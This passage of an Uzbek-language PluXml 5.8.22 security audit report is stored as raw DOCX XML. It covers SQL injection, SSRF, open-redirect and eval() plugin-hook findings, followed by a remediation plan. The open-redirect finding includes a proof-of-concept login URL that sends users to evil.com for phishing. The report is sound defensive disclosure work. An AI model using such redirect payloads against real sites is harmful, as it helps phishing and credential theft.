              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">[VUL-007] SQL Injection Yo'q — XML Ma'lumot Saqlash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498DB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">INFO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CVSS Score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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Butun tizim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PluXml ma'lumotlar bazasini ishlatmaydi — barcha ma'lumotlar XML fayllarda saqlanadi. Shu sababli klassik SQL Injection zaifliklarining xavfi yo'q.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bu arxitekturaviy qaror SQL injection vektorlarini yo'q qiladi, lekin boshqa xavflarni (XML injection, file manipulation) keltiradi. Hech qanday SQL-ga oid zaiflik topilmadi.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SQL Injection zaifliklaridan foydalanish mumkin emas.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PoC /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SQL injection testi o'tkazildi — zaiflik topilmadi.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Maxsus chora talab etilmaydi. Ammo XML fayllarni to'g'ri sanitize qilish davom ettirilishi kerak.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.8. SSRF Imkoniyati — GitHub URL Qotib Qolgan (Minimal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0"/>
        <w:gridCol w:w="7360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F1C40F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">[VUL-008] SSRF Imkoniyati — GitHub URL Qotib Qolgan (Minimal Risk)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F1C40F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW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CVSS Score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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2.7 (AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N)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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">core/lib/class.plx.admin.php:1318 — checkMaj()</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Versiyani tekshirish funksiyasi (checkMaj) GitHub API ga curl so'rov yuboradi. URL konstanta sifatida qotib qolgan:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  const PLX_URL_LAST_RELEASE_GITHUB = 'https://api.github.com/repos/pluxml/PluXml/releases/latest';</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bu to'g'ridan-to'g'ri foydalanuvchi-kontrollangan emas, ammo agar kod kengaytmalar yoki pluginlar orqali modifikatsiya qilinsa, SSRF xavfi paydo bo'lishi mumkin. Hozirgi konfiguratsiyada xavf minimal.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Minimal — URL foydalanuvchi tomonidan boshqarilmaydi.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PoC /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Bevosita exploitation mumkin emas. Faqat konfiguratsiya fayli modifikatsiya qilinsa tahlil qilish kerak.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Versiya tekshiruvi uchun curl so'rovini faqat rejalashtirilgan domenlar bilan cheklash (allowlist). Pluginlar ham URL validatsiyasiga bo'ysunishi kerak.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.9. Open Redirect — Autentifikatsiya Sahifasida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0"/>
        <w:gridCol w:w="7360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E67E22" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">[VUL-009] Open Redirect — Autentifikatsiya Sahifasida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7E22"/>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CVSS Score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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4.7 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">core/admin/auth.php — redirect logikasi (lines 50-70)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Login sahifasida ?p= parametri orqali muvaffaqiyatli logindan so'ng redirect qilinadi. Kod quyidagi tekshiruvni bajaradi:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  $get_p = parse_url(urldecode($_GET['p']));</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  $css = (isset($get_p['host']) and $racine['host'] != $get_p['host']);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ammo faqat path qismini tekshirish uchun basename() ishlatiladi:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  file_exists(__DIR__ . '/' . basename($get_p['path']))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Muammo: Nisbiy URL, protocol-relative URL va boshqa ko'rinishdagi manipulyatsiyalar bilan host tekshiruvini chetlab o'tish imkoni mavjud.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Misol: //evil.com/ — parse_url bu'ni host=evil.com deb tushunadi, lekin ba'zi kontekstlarda chetlab o'tilishi mumkin.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 Phishing hujumlariga vosita</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Foydalanuvchini login'dan keyin yolg'on saytga yo'naltirish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Maxfiy ma'lumot o'g'irlash sxemalari uchun qulay vosita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PoC /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http://target.com/core/admin/auth.php?p=//evil.com/fake-admin/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Login muvaffaqiyatli bo'lgandan so'ng foydalanuvchi evil.com'ga redirect bo'lishi mumkin.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 Redirect URL'ni mutlaq whitelist bilan tekshirish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Faqat o'z domeniga nisbiy redirect'larni ruxsat berish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- parse_url natijasida host va scheme'ni strict tekshirish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Barcha redirect'lar uchun htmlentities() ishlatish (hozir faqat Ba'zi joylarda)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.10. Qachon Eski Texnologiya: PHP eval() Hook Tizimida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0"/>
        <w:gridCol w:w="7360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E67E22" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">[VUL-010] Qachon Eski Texnologiya: PHP eval() Hook Tizimida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7E22"/>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CVSS Score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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.0 (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)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Location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1A2E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Barcha admin fayllar — plxPlugins::callHook() / eval()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PluXml plugin tizimi eval() funksiyasiga asoslangan. Butun admin panelida yuzdan ortiq eval() chaqiruvi mavjud:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  eval($plxAdmin-&gt;plxPlugins-&gt;callHook('AdminArticleContent'))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  eval($plxAdmin-&gt;plxPlugins-&gt;callHook('AdminMediasPrepend'))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  // va h.k.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bu o'zida xavfli emas (plugin kodi serverda saqlanadi), ammo:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Agar plugin fayli yoziladigan bo'lsa va tajovuzkor kodni kiritsa → RCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Plugin import funksiyasi mavjud bo'lsa va validatsiya zaifligi bo'lsa → indirect RCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Kelajakda kod injection zaifliklariga keng hujum yuzasi yaratadi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hozircha callHook() faqat saqlangan plugin kodini qaytaradi, foydalanuvchi inputi bevosita eval'ga tushmaydi.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 Plugin fayllari o'zgartirilsa, to'liq RCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Keng hujum yuzasi — butun admin panelida eval() har bir so'rovda chaqiriladi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Defense-in-depth yetishmovchiligi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PoC /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To'g'ridan-to'g'ri exploitation: Plugin admin tomonidan o'rnatilgandan keyin istalgan kodni bajarishi mumkin.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bilvosita: Agar file write zaiflik bo'lsa, plugin fayliga zararliy kod kiritish mumkin.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18"/>
                <w:szCs w:val="18"/>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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- PHP 8.x'da eval() o'rniga reflection yoki callable interface'lardan foydalanish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Plugin fayllari imzolanishi (code signing) va integrity tekshiruvi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Plugin fayllarining yozilish huquqlarini cheklash (read-only deployment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. Tuzatish Rejalari (Priority)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quyidagi jadval zaifliklarni ustuvorlik tartibida tuzatish rejasini ko'rsatadi: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800"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr>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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ustuvorlik</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Zaiflik</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Muddati</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resurs</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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P1 — CRITICAL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[VUL-001] RCE via Theme Editor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Darhol (0-24 soat)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Senior Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P2 — 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[VUL-002] SVG Upload XSS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1-3 kun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Dev + Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P2 — 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[VUL-003] Reflected XSS (admin)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1-3 kun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Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P2 — 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[VUL-004] Zaif parol xeshlash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hafta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Senior Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P3 — 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[VUL-005] Brute Force himoyasi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hafta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Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P3 — 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[VUL-006] Stored XSS (comment site)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hafta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Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P3 — 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[VUL-009] Open Redirect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hafta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Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P3 — 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[VUL-010] eval() hook tizimi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Kelajak sprint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Arxitektor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P4 — 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[VUL-008] SSRF (minimal)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oy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Dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6. Xulosa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PluXml 5.8.22 statik kod tahlili natijasida bir qator jiddiy zaifliklar aniqlandi. Eng kritik topilma (VUL-001) autentifikatsiyadan o'tgan admin foydalanuvchi RCE imkonini beradi — bu holat CMS uchun keng tarqalgan attack vektori hisoblanadi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ijobiy tomonlar: PluXml SQL Injection xavfidan xoli (XML-asosli arxitektura), LFI/RFI va Path Traversal uchun himoya mexanizmlari mavjud, CSRF tokenlar joriy etilgan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tavsiya: Yuqoridagi P1/P2 ustuvorlikdagi zaifliklarni zudlik bilan tuzatish, parol xeshlash algoritmini bcrypt/argon2 ga ko'chirish va SVG fayllarni yuklashni cheklash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mas'ul organ: Alliance Security | Alijonov Alisher | Toshkent, O'zbekiston | 2026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color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Alliance Security — PluXml 5.8.22 Security Audit Report | Sahifa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2026-06-19T19:07:04.691Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-19T19:07:04.691Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>